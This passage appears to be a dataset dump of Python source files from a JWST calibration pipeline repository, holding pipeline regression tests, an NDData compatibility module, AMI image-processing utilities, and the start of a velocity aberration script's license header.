# The output filename\n \"\"\"\n\n def process(self, *args):\n science = datamodels.open(self.science_filename)\n if self.flat_filename is None:\n self.flat_filename = join(dirname(__file__), \"data/flat.fits\")\n flat = datamodels.open(self.flat_filename)\n calibrated = []\n calibrated.append(self.flat_field(science, flat))\n combined = self.combine(calibrated)\n self.display(combined)\n dm = datamodels.ImageModel(combined)\n dm.save(self.output_filename)\n science.close()\n flat.close()\n return dm\n\n\ndef test_pipeline(_jail):\n pipeline_fn = join(dirname(__file__), 'steps', 'python_pipeline.cfg')\n pipe = Step.from_config_file(pipeline_fn)\n pipe.output_filename = \"output.fits\"\n\n assert pipe.flat_field.threshold == 42.0\n assert pipe.flat_field.multiplier == 2.0\n\n pipe.run()\n\n\ndef test_pipeline_python(_jail):\n steps = {\n 'flat_field': {'threshold': 42.0}\n }\n\n pipe = MyPipeline(\n \"MyPipeline\",\n config_file=__file__,\n steps=steps,\n science_filename=abspath(join(dirname(__file__), 'data', 'science.fits')),\n flat_filename=abspath(join(dirname(__file__), 'data', 'flat.fits')),\n output_filename=\"output.fits\")\n\n assert pipe.flat_field.threshold == 42.0\n assert pipe.flat_field.multiplier == 1.0\n\n pipe.run()\n\n\nclass MyLinearPipeline(LinearPipeline):\n pipeline_steps = [\n ('multiply', MultiplyBy2),\n ('multiply2', MultiplyBy2),\n ('multiply3', MultiplyBy2)\n ]\n\n\ndef test_partial_pipeline(_jail):\n pipe = MyLinearPipeline()\n\n pipe.end_step = 'multiply2'\n result = pipe.run(abspath(join(dirname(__file__), 'data', 'science.fits')))\n\n pipe.start_step = 'multiply3'\n pipe.end_step = None\n result = pipe.run(abspath(join(dirname(__file__), 'data', 'science.fits')))\n\n assert_allclose(np.sum(result.data), 9969.82514685, rtol=1e-4)\n\n\ndef test_pipeline_commandline(_jail):\n args = [\n abspath(join(dirname(__file__), 'steps', 'python_pipeline.cfg')),\n '--steps.flat_field.threshold=47'\n ]\n\n pipe = Step.from_cmdline(args)\n\n assert pipe.flat_field.threshold == 47.0\n assert pipe.flat_field.multiplier == 2.0\n\n pipe.run()\n\n\ndef test_pipeline_commandline_class(_jail):\n args = [\n 'jwst.stpipe.tests.test_pipeline.MyPipeline',\n '--logcfg={0}'.format(\n abspath(join(dirname(__file__), 'steps', 'log.cfg'))),\n # The file_name parameters are *required*\n '--science_filename={0}'.format(\n abspath(join(dirname(__file__), 'data', 'science.fits'))),\n '--output_filename={0}'.format(\n 'output.fits'),\n '--steps.flat_field.threshold=47'\n ]\n\n pipe = Step.from_cmdline(args)\n\n assert pipe.flat_field.threshold == 47.0\n assert pipe.flat_field.multiplier == 1.0\n\n pipe.run()\n\n\ndef test_pipeline_commandline_invalid_args():\n from io import StringIO\n\n args = [\n 'jwst.stpipe.tests.test_pipeline.MyPipeline',\n # The file_name parameters are *required*, and one of them\n # is missing, so we should get a message to that effect\n # followed by the commandline usage message.\n '--flat_filename={0}'.format(\n abspath(join(dirname(__file__), 'data', 'flat.fits'))),\n '--steps.flat_field.threshold=47'\n ]\n\n sys.stdout = buffer = StringIO()\n\n with pytest.raises(ValueError):\n Step.from_cmdline(args)\n\n help = buffer.getvalue()\n assert \"Multiply by this number\" in help\n" }, { "alpha_fraction": 0.6379310488700867, "alphanum_fraction": 0.6379310488700867, "avg_line_length": 18.33333396911621, "blob_id": "3d09f4e6c277301ee16cd013f2f9c2415685221b", "content_id": "02786c336309937fbcd83299d0d359a32d898d80", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "permissive", "max_line_length": 32, "num_lines": 3, "path": "/jwst/rscd/__init__.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from .rscd_step import RSCD_Step\n\n__all__ = ['RSCD_Step']\n" }, { "alpha_fraction": 0.5076512694358826, "alphanum_fraction": 0.5766903758049011, "avg_line_length": 33.90683364868164, "blob_id": "2196bd9dac7eb1588bbab6ac3d17bebfcb21d3c7", "content_id": "3419b218d7cd8a6ead12946205f9303881c9a008", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5620, "license_type": "permissive", "max_line_length": 88, "num_lines": 161, "path": "/jwst/tests_nightly/general/niriss/test_niriss_steps_single.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\nfrom jwst.pipeline import (\n Ami3Pipeline,\n Detector1Pipeline,\n)\nfrom jwst.ramp_fitting import RampFitStep\nfrom jwst.photom import PhotomStep\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\n\[email protected]\nclass TestAMIPipeline(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_ami_pipeline', 'truth']\n test_dir = 'test_ami_pipeline'\n\n def test_ami_pipeline(self):\n \"\"\"\n Regression test of the AMI pipeline performed on NIRISS AMI data.\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n 'test_lg1_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n pipe = Ami3Pipeline()\n pipe.save_averages = True\n pipe.ami_analyze.oversample = 3\n pipe.ami_analyze.rotation = 1.49\n pipe.run(asn_file)\n\n outputs = [('test_targ_aminorm.fits',\n 'ami_pipeline_targ_lgnorm.fits'),\n ]\n self.compare_outputs(outputs, rtol=0.00001,\n ignore_hdus=['ASDF', 'HDRTAB'])\n\n\[email protected]\nclass TestDetector1Pipeline(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_detector1pipeline', 'truth']\n test_dir = 'test_detector1pipeline'\n\n def test_niriss_detector1(self):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on NIRISS data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00034001001_01101_00001_NIRISS_uncal.fits')\n step = Detector1Pipeline()\n step.save_calibrated_ramp = True\n step.ipc.skip = True\n step.persistence.skip = True\n step.refpix.odd_even_columns = True\n step.refpix.use_side_ref_pixels = True\n step.refpix.side_smoothing_length = 11\n step.refpix.side_gain = 1.0\n step.refpix.odd_even_rows = True\n step.jump.rejection_threshold = 250.0\n step.ramp_fit.save_opt = False\n step.ramp_fit.suffix = 'ramp'\n step.output_file = 'jw00034001001_01101_00001_NIRISS_rate.fits'\n\n step.run(input_file)\n\n outputs = [('jw00034001001_01101_00001_NIRISS_ramp.fits',\n 'jw00034001001_01101_00001_NIRISS_ramp_ref.fits'),\n ('jw00034001001_01101_00001_NIRISS_rate.fits',\n 'jw00034001001_01101_00001_NIRISS_rate_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRISSSOSS2Pipeline(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_spec2pipeline', 'truth']\n test_dir = 'test_spec2pipeline'\n\n def test_nirisssoss2pipeline1(self):\n \"\"\"\n Regression test of calwebb_tso_spec2 pipeline performed on NIRISS SOSS data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw10003001002_03101_00001-seg003_nis_rateints.fits')\n collect_pipeline_cfgs()\n args = [\n 'calwebb_tso-spec2.cfg',\n input_file\n ]\n Step.from_cmdline(args)\n\n outputs = [{'files':('jw10003001002_03101_00001-seg003_nis_calints.fits',\n 'jw10003001002_03101_00001-seg003_nis_calints_ref.fits'),\n 'pars':dict(ignore_hdus=['INT_TIMES', 'VAR_POISSON',\n 'VAR_RNOISE', 'ASDF'])},\n {'files':('jw10003001002_03101_00001-seg003_nis_x1dints.fits',\n 'jw10003001002_03101_00001-seg003_nis_x1dints_ref.fits'),\n 'pars':dict(ignore_hdus=['INT_TIMES', 'ASDF'])}\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRISSPhotom(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_photom', 'truth']\n test_dir = 'test_photom'\n\n def test_photom_niriss(self):\n \"\"\"\n Regression test of photom step performed on NIRISS imaging data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00034001001_01101_00001_NIRISS_flat_field.fits')\n\n result = PhotomStep.call(input_file)\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00034001001_01101_00001_NIRISS_photom.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRISSRampFit(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_ramp_fit', 'truth']\n test_dir = 'test_ramp_fit'\n\n def test_ramp_fit_niriss(self):\n \"\"\"\n Regression test of ramp_fit step performed on NIRISS data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00034001001_01101_00001_NIRISS_jump.fits')\n\n result, result_int = RampFitStep.call(input_file,\n save_opt=True,\n opt_name='rampfit_opt_out.fits'\n )\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00034001001_01101_00001_NIRISS_ramp_fit.fits'),\n ('rampfit_opt_out_fitopt.fits',\n 'jw00034001001_01101_00001_NIRISS_uncal_opt.fits',\n ['primary','slope','sigslope','yint','sigyint',\n 'pedestal','weights','crmag'])\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5054572820663452, "alphanum_fraction": 0.5875046849250793, "avg_line_length": 31.40243911743164, "blob_id": "32abdfd6527cb5643c7a337b2fb16fecda1fbfb4", "content_id": "0c56b6dc0d427e772ea15bfd2102554b0977fd44", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2657, "license_type": "permissive", "max_line_length": 86, "num_lines": 82, "path": "/jwst/tests_nightly/general/nirspec/test_nirspec_fs_spec3.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test calwebb_spec3 against NIRSpec Fixed-slit science (FSS)\"\"\"\nfrom glob import glob\nfrom os import path\nimport pytest\n\nfrom jwst.associations import load_asn\nfrom jwst.pipeline import Spec3Pipeline\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestSpec3Pipeline(BaseJWSTTest):\n input_loc = 'nirspec'\n\n def test_save_source_only(self):\n \"\"\"Test saving the source-based files only\"\"\"\n datapath = ['test_datasets', 'fss', '93045', 'level2b']\n\n asn_file = self.get_data(*datapath,\n 'jw93045-o010_20180725t035735_spec3_001_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(*datapath, file)\n\n pipe = Spec3Pipeline()\n pipe.mrs_imatch.skip = True\n pipe.outlier_detection.skip = True\n pipe.resample_spec.skip = True\n pipe.cube_build.skip = True\n pipe.extract_1d.skip = True\n\n pipe.run(asn_file)\n\n # Check resulting product\n with open(asn_file) as fh:\n asn = load_asn(fh)\n base_name = asn['products'][0]['name']\n product_name = base_name.format(source_id='s00000') + '_cal.fits'\n output_files = glob('*')\n\n if product_name in output_files:\n output_files.remove(product_name)\n else:\n assert False\n\n\n @pytest.mark.xfail(\n reason='See Issue JP-1144',\n run=False\n )\n def test_nrs_fs_spec3(self):\n \"\"\"\n Regression test of calwebb_spec3 pipeline performed on\n NIRSpec fixed-slit data.\n \"\"\"\n cfg_dir = './cfgs'\n collect_pipeline_cfgs(cfg_dir)\n datapath = ['test_datasets', 'fss', '93045', 'level2b']\n asn_file = self.get_data(*datapath,\n 'jw93045-o010_20180725t035735_spec3_001_asn.json')\n\n for file in raw_from_asn(asn_file):\n self.get_data(*datapath, file)\n\n args = [\n path.join(cfg_dir, 'calwebb_spec3.cfg'),\n asn_file\n ]\n\n Step.from_cmdline(args)\n\n # Compare results\n outputs = [('jw00023001001_01101_00001_NRS1_cal.fits',\n 'jw00023001001_01101_00001_NRS1_cal_ref.fits'),\n ('jw00023001001_01101_00001_NRS1_s2d.fits',\n 'jw00023001001_01101_00001_NRS1_s2d_ref.fits'),\n ('jw00023001001_01101_00001_NRS1_x1d.fits',\n 'jw00023001001_01101_00001_NRS1_x1d_ref.fits')\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5496792793273926, "alphanum_fraction": 0.5505956411361694, "avg_line_length": 25.89788818359375, "blob_id": "6c3189937d90d50530ba11886da18b9303ff26c1", "content_id": "4d8b46ee9bb97ee98df3583f21385dd37f8a960b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7639, "license_type": "permissive", "max_line_length": 79, "num_lines": 284, "path": "/jwst/datamodels/ndmodel.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nSubclass of NDDataBase to support DataModel compatibility with NDData\n\"\"\"\n\nimport os.path\nimport numpy as np\nimport collections\n\nfrom astropy.units import Quantity\nfrom astropy.nddata import nddata_base\n\nfrom . import util\nfrom . import filetype\nfrom . import properties\n\n#---------------------------------------\n# astropy.io.registry compatibility\n#---------------------------------------\n\ndef identify(origin, path, fileobj, *args, **kwargs):\n \"\"\"\n Identify if file is a DataModel for astropy.io.registry\n \"\"\"\n if fileobj:\n file_type = filetype.check(fileobj)\n elif path:\n if os.path.isfile(path):\n file_type = filetype.check(path)\n else:\n file_type = path.lower().split(\".\")[1]\n else:\n file_type = None\n\n flag = file_type and (file_type == \"asdf\" or file_type == \"fits\")\n return flag\n\ndef read(data, *args, **kwargs):\n \"\"\"\n Astropy.io registry compatibility function to wrap util.open\n \"\"\"\n\n # Translate keyword arguments to those expected by ImageModel\n xargs = {}\n if kwargs.get(\"mask\"):\n xargs[\"dq\"] = kwargs[\"mask\"]\n\n uncertainty = kwargs.get(\"uncertainty\")\n if uncertainty:\n if isinstance(uncertainty, Quantity):\n uncertainty_type = uncertainty.unit\n uncertainty = uncertainty.data\n else:\n uncertainty_type = None\n xargs[\"err\"] = uncertainty\n else:\n uncertainty_type = None\n\n if hasattr(data, 'mask') and hasattr(data, 'data'):\n xargs[\"dq\"] = data.mask\n data = data.data\n\n if isinstance(data, Quantity):\n unit = data.unit\n data = data.value\n else:\n unit = kwargs.get(\"unit\")\n\n # Create the model using the transformed arguments\n model = util.open(data, **xargs)\n\n # Add attributes passed as keyword arguments to model\n if unit:\n model.meta.bunit_data = unit\n\n wcs = kwargs.get(\"wcs\")\n if wcs:\n model.set_fits_wcs(wcs)\n\n if uncertainty_type:\n model.meta.bunit_err = uncertainty_type\n\n return model\n\ndef write(data, path, *args, **kwargs):\n \"\"\"\n Astropy.io registry compatabilty function to wrap datamodel.savw\n \"\"\"\n from .model_base import DataModel\n\n if not isinstance(data, DataModel):\n model = DataModel(data)\n else:\n model = data\n\n if isinstance(path, str):\n model.save(path, *args, **kwargs)\n else:\n raise ValueError(\"Path to write DataModel was not found\")\n\n#---------------------------------------\n# Astropy NDData compatibility\n#---------------------------------------\n\nclass NDModel(nddata_base.NDDataBase):\n def my_attribute(self, attr):\n \"\"\"\n Test if attribute is part of the NDData interface\n \"\"\"\n properties = frozenset((\"data\", \"mask\", \"unit\", \"wcs\", \"unceratainty\"))\n return attr in properties\n\n @property\n def data(self):\n \"\"\"\n Read the stored dataset.\n \"\"\"\n primary_array_name = self.get_primary_array_name()\n if primary_array_name:\n primary_array = self.__getattr__(primary_array_name)\n else:\n raise AttributeError(\"No attribute 'data'\")\n return primary_array\n\n @data.setter\n def data(self, value):\n \"\"\"\n Write the stored dataset.\n \"\"\"\n primary_array_name = self.get_primary_array_name()\n if not primary_array_name:\n primary_array_name = 'data'\n properties.ObjectNode.__setattr__(self, primary_array_name, value)\n\n @property\n def mask(self):\n \"\"\"\n Read the mask for the dataset.\n \"\"\"\n return self.__getattr__('dq')\n\n @mask.setter\n def mask(self, value):\n \"\"\"\n Write the mask for the dataset.\n \"\"\"\n properties.ObjectNode.__setattr__(self, 'dq', value)\n\n @property\n def unit(self):\n \"\"\"\n Read the units for the dataset.\n \"\"\"\n try:\n val = self.meta.bunit_data\n except AttributeError:\n val = None\n return val\n\n @unit.setter\n def unit(self, value):\n \"\"\"\n Write the units for the dataset.\n \"\"\"\n self.meta.bunit_data = value\n\n @property\n def wcs(self):\n \"\"\"\n Read the world coordinate system (WCS) for the dataset.\n \"\"\"\n return self.get_fits_wcs()\n\n @wcs.setter\n def wcs(self, value):\n \"\"\"\n Write the world coordinate system (WCS) to the dataset.\n \"\"\"\n return self.set_fits_wcs(value)\n\n @property\n def meta(self):\n \"\"\"\n Read additional meta information about the dataset.\n \"\"\"\n return self.__getattr__('meta')\n\n\n @property\n def uncertainty(self):\n \"\"\"\n Read the uncertainty in the dataset.\n \"\"\"\n err = self.err\n try:\n val = self.meta.bunit_err\n except AttributeError:\n val = None\n return Uncertainty(err, uncertainty_type=val)\n\n @uncertainty.setter\n def uncertainty(self, value):\n \"\"\"\n Write the uncertainty in the dataset.\n \"\"\"\n properties.ObjectNode.__setattr__(self, 'err', value)\n if hasattr(value, 'uncertainty_type'):\n self.meta.bunit_err = value.uncertainty_type\n\n#---------------------------------------------\n# The following classes provide support\n# for the NDData interface to Datamodels\n#---------------------------------------------\n\nclass MetaNode(properties.ObjectNode, collections.abc.MutableMapping):\n \"\"\"\n NDData compatibility class for meta node\n \"\"\"\n def __init__(self, name, instance, schema, ctx):\n properties.ObjectNode.__init__(self, name, instance, schema, ctx)\n\n def _find(self, path):\n if not path:\n return self\n\n cursor = self._instance\n schema = self._schema\n for attr in path:\n try:\n cursor = cursor[attr]\n except KeyError:\n raise KeyError(\"'%s'\" % '.'.join(path))\n schema = properties._get_schema_for_property(schema, attr)\n\n key = '.'.join(path)\n return properties._make_node(key, cursor, schema, self._ctx)\n\n def __delitem__(self, key):\n path = key.split('.')\n parent = self._find(path[:-1])\n try:\n parent.__delattr__(path[-1])\n except KeyError:\n raise KeyError(\"'%s'\" % key)\n\n def __getitem__(self, key):\n path = key.split('.')\n return self._find(path)\n\n def __len__(self):\n def recurse(val):\n n = 0\n for subval in val.values():\n if isinstance(subval, dict):\n n += recurse(subval)\n else:\n n += 1\n return n\n\n return recurse(self._instance)\n\n def __setitem__(self, key, value):\n path = key.split('.')\n parent = self._find(path[:-1])\n try:\n parent.__setattr__(path[-1], value)\n except KeyError:\n raise KeyError(\"'%s'\" % key)\n\nclass Uncertainty(np.ndarray):\n \"\"\"\n Subclass ndarray to include an additional property, uncertainty_type\n \"\"\"\n def __new__(cls, err, uncertainty_type=None):\n # info on how to subclass np.ndarray is at\n # https://docs.scipy.org/doc/numpy/user/basics.subclassing.html\n # this code is taken from there\n obj = np.asarray(err).view(cls)\n obj.uncertainty_type = uncertainty_type\n return obj\n\n def __array_finalize__(self, obj):\n if obj is None:\n return\n self.uncertainty_type = getattr(obj, 'uncertainty_type', None)\n" }, { "alpha_fraction": 0.5593464374542236, "alphanum_fraction": 0.5726030468940735, "avg_line_length": 24.142118453979492, "blob_id": "15101614cca81d4e5a8e975ff5e1520b8060b117", "content_id": "8d2e50902a0c6a461f05be7c836a3c2d019fc2dd", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9731, "license_type": "permissive", "max_line_length": 81, "num_lines": 387, "path": "/jwst/ami/utils.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\nimport logging\n\nfrom jwst.datamodels import dqflags\n\nimport numpy as np\nimport numpy.fft as fft\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\ndef quadratic(p, x):\n \"\"\"\n Short Summary\n -------------\n Calculate value of x at minimum or maximum value of y,\n (value of quadratic function at argument)\n\n Parameters\n ----------\n p: numpy array, 3 floats\n quadratic function: p[0]*x*x + p[1]*x + p[2]\n\n x: 1D float array\n arguments of p()\n\n Returns\n -------\n maxx: float\n value of x at minimum or maximum value of y\n\n maxy: float\n max y = -b^2/4a occurs at x = -b^2/2a\n\n fit_val: 1D float array\n values of quadratic function at arguments in x array\n \"\"\"\n maxx = -p[1] / (2.0 * p[0])\n maxy = -p[1] * p[1] / (4.0 * p[0]) + p[2]\n fit_val = p[0] * x * x + p[1] * x + p[2]\n\n return maxx, maxy, fit_val\n\n\ndef makeA(nh):\n \"\"\"\n Long Summary\n -------------\n Writes the 'NRM matrix' that gets pseudo-inverted to provide\n (arbitrarily constrained) zero-mean phases of the holes.\n Algorithm is taken verbatim from Anand's pseudoinverse.py\n\n Ax = b where x are the nh hole phases, b the nh(nh-1)/2 fringe phases,\n and A the NRM matrix\n\n Solve for the hole phases:\n Apinv = np.linalg.pinv(A)\n Solution for unknown x's:\n x = np.dot(Apinv, b)\n\n Following Noah Gamper's convention of fringe phases,\n for holes 'a b c d e f g', rows of A are\n\n (-1 +1 0 0 ...)\n (0 -1 +1 0 ...)\n\n which is implemented in makeA() as:\n matrixA[row,h2] = -1\n matrixA[row,h1] = +1\n\n To change the convention just reverse the signs of the 'ones'.\n\n When tested against Alex'' nrm_model.py 'piston_phase' text output\n of fringe phases, these signs appear to be correct -\n [email protected] 12 Nov 2014\n\n Parameters\n ----------\n nh: integer\n number of holes in NR mask\n\n Returns\n -------\n matrixA: 2D float array\n nh columns, nh(nh-1)/2 rows (eg 21 for nh=7)\n \"\"\"\n log.debug('-------')\n log.debug(' makeA:')\n\n ncols = (nh * (nh - 1)) // 2\n nrows = nh\n matrixA = np.zeros((ncols, nrows))\n\n row = 0\n for h2 in range(nh):\n for h1 in range(h2 + 1, nh):\n if h1 >= nh:\n break\n else:\n log.debug(' row: %s, h1: %s, h2: %s', row, h1, h2)\n\n matrixA[row, h2] = -1\n matrixA[row, h1] = +1\n row += 1\n\n log.debug('matrixA:')\n log.debug(' %s', matrixA)\n\n return matrixA\n\n\ndef fringes2pistons(fringephases, nholes):\n \"\"\"\n Short Summary\n -------------\n For nrm_model.py to use to extract pistons out of fringes, given\n its hole bookkeeping, which apparently matches that of this module,\n and is the same as Noah Gamper's.\n\n Parameters\n ----------\n fringephases: 1D integer array\n fringe phases\n\n nholes: integer\n number of holes\n\n Returns\n -------\n np.dot(Apinv, fringephases): 1D integer array\n pistons in same units as fringe phases\n \"\"\"\n Anrm = makeA(nholes)\n Apinv = np.linalg.pinv(Anrm)\n\n return -np.dot(Apinv, fringephases)\n\n\ndef rebin(a=None, rc=(2, 2)):\n \"\"\"\n Short Summary\n -------------\n Perform simple-minded flux-conserving binning using specified binning\n kernel, clipping trailing size mismatch: eg a 10x3 array binned by\n 3 results in a 3x1 array\n\n Parameters\n ----------\n a: 2D float array\n input array to bin\n\n rc: 2D float array\n binning kernel\n\n Returns\n -------\n binned_arr: float array\n binned array\n \"\"\"\n binned_arr = krebin(a, (a.shape[0] // rc[0], a.shape[1] // rc[1]))\n\n return binned_arr\n\n\ndef krebin(a, shape):\n \"\"\"\n Short Summary\n -------------\n Klaus P's fastrebin from web\n\n Parameters\n ----------\n a: 2D float array\n input array to rebin\n\n shape: tuple (integer, integer)\n dimensions of array 'a' binned down by dimensions of binning kernel\n\n Returns\n -------\n reshaped_a: 2D float array\n reshaped input array\n \"\"\"\n sh = shape[0], a.shape[0] // shape[0], shape[1], a.shape[1] // shape[1]\n reshaped_a = a.reshape(sh).sum(-1).sum(1)\n\n return reshaped_a\n\n\ndef rcrosscorrelate(a=None, b=None):\n \"\"\"\n Short Summary\n -------------\n Calculate cross correlation of two identically-shaped real arrays\n\n Parameters\n ----------\n a: 2D float array\n first input array\n\n b: 2D float array\n second input array\n\n Returns\n -------\n c.real.copy():\n real part of array that is the correlation of the two input arrays.\n \"\"\"\n\n c = crosscorrelate(a=a, b=b)/(np.sqrt((a*a).sum())*np.sqrt((b*b).sum()))\n return c.real.copy()\n\n\ndef crosscorrelate(a=None, b=None):\n \"\"\"\n Short Summary\n -------------\n Calculate cross correlation of two identically-shaped real or complex arrays\n\n Parameters\n ----------\n a: 2D complex float array\n first input array\n\n b: 2D complex float array\n second input array\n\n Returns\n -------\n fft.fftshift(c)\n complex array that is the correlation of the two input arrays.\n \"\"\"\n if a.shape != b.shape:\n log.critical('crosscorrelate: need identical arrays')\n return None\n\n fac = np.sqrt(a.shape[0] * a.shape[1])\n\n A = fft.fft2(a) / fac\n B = fft.fft2(b) / fac\n c = fft.ifft2(A * B.conj()) * fac * fac\n\n log.debug('----------------')\n log.debug(' crosscorrelate:')\n log.debug(' a: %s:', a)\n log.debug(' A: %s:', A)\n log.debug(' b: %s:', b)\n log.debug(' B: %s:', B)\n log.debug(' c: %s:', c)\n log.debug(' a.sum(): %s:', a.sum())\n log.debug(' b.sum(): %s:', b.sum())\n log.debug(' c.sum(): %s:', c.sum())\n log.debug(' a.sum()*b.sum(): %s:', a.sum() * b.sum())\n log.debug(' c.sum().real: %s:', c.sum().real)\n log.debug(' a.sum()*b.sum()/c.sum().real: %s:', a.sum()*b.sum()/c.sum().real)\n\n return fft.fftshift(c)\n\n\ndef findmax(mag, vals, mid=1.0):\n \"\"\"\n Short Summary\n -------------\n Fit a quadratic to the given input arrays mag and vals, and calculate the\n value of mag at the extreme value of vals.\n\n Parameters\n ----------\n mag: 1D float array\n array for abscissa\n\n vals: 1D float array\n array for ordinate\n\n mid: float\n midpoint of range\n\n Returns\n -------\n maxx: float\n value of mag at the extreme value of vals\n\n maxy: float\n value of vals corresponding to maxx\n \"\"\"\n p = np.polyfit(mag, vals, 2)\n fitr = np.arange(0.95 * mid, 1.05 * mid, .01)\n maxx, maxy, fitc = quadratic(p, fitr)\n\n return maxx, maxy\n\ndef pix_median_fill_value(input_array, input_dq_array, bsize, xc, yc):\n \"\"\"\n Short Summary\n -------------\n For the pixel specified by (xc, yc), calculate the median value of the\n good values within the box of size bsize neighboring pixels. If any of\n the box is outside the data, 0 will be returned.\n\n Parameters\n ----------\n input_array: ndarray\n 2D input array to filter\n input_dq_array: ndarray\n 2D input data quality array\n bsize: scalar\n square box size of the data to extract\n xc: scalar\n x position of the data extraction\n yc: scalar\n y position of the data extraction\n\n Returns\n -------\n median_value: float\n median value of good values within box of neighboring pixels\n\n \"\"\"\n # set the half box size\n hbox = int(bsize/2)\n\n # Extract the region of interest for the data\n try:\n data_array = input_array[xc - hbox:xc + hbox, yc - hbox: yc + hbox]\n dq_array = input_dq_array[xc - hbox:xc + hbox, yc - hbox: yc + hbox]\n except IndexError:\n # If the box is outside the data return 0\n log.warning('Box for median filter is outside the data.')\n return 0.\n\n wh_good = np.where((np.bitwise_and(dq_array, dqflags.pixel['DO_NOT_USE'])\n == 0))\n\n filtered_array = data_array[wh_good]\n\n median_value = np.nanmedian(filtered_array)\n\n if np.isnan(median_value):\n # If the median fails return 0\n log.warning('Median filter returned NaN setting value to 0.')\n median_value = 0.\n\n return median_value\n\n\ndef img_median_replace(img_model, box_size):\n \"\"\"\n Short Summary\n -------------\n Replace bad pixels (either due to a dq value of DO_NOT_USE or having a value\n of NaN) with the median value of surrounding good pixels.\n\n Parameters\n ----------\n img_model: image model containing input array to filter.\n\n box_size: scalar\n box size for the median filter\n\n Returns\n -------\n img_model: input image model whose input array has its bad pixels replaced\n by the median of the surrounding good-value pixels.\n \"\"\"\n input_data = img_model.data\n input_dq = img_model.dq\n\n num_nan = np.count_nonzero(np.isnan(input_data))\n num_dq_bad = np.count_nonzero(input_dq == dqflags.pixel['DO_NOT_USE'])\n\n # check to see if any of the pixels are flagged\n if (num_nan + num_dq_bad > 0):\n bad_locations = np.where(np.isnan(input_data) |\n np.equal(input_dq, dqflags.pixel['DO_NOT_USE']))\n\n # fill the bad pixel values with the median of the data in a box region\n for i_pos in range(len(bad_locations[0])):\n x_box_pos = bad_locations[0][i_pos]\n y_box_pos = bad_locations[1][i_pos]\n\n median_fill = pix_median_fill_value(input_data, input_dq,\n box_size, x_box_pos, y_box_pos)\n\n input_data[x_box_pos, y_box_pos] = median_fill\n\n img_model.data = input_data\n\n return img_model\n" }, { "alpha_fraction": 0.6499210596084595, "alphanum_fraction": 0.6572412848472595, "avg_line_length": 34.91237258911133, "blob_id": "53f36b7bfa0bd9922cc3e9811a58f2178ec2227b", "content_id": "e05fb5520fe00c94ad0e0d20620ef213cc2a1d3e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6967, "license_type": "permissive", "max_line_length": 86, "num_lines": 194, "path": "/scripts/set_velocity_aberration.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# Copyright (C) 2010-2011 Association of Universities for Research in Astronomy (AURA)\n\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n\n# 3. The name of AURA and its representatives may not be used to\n# endorse or promote products derived from this software without\n# specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS\n# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 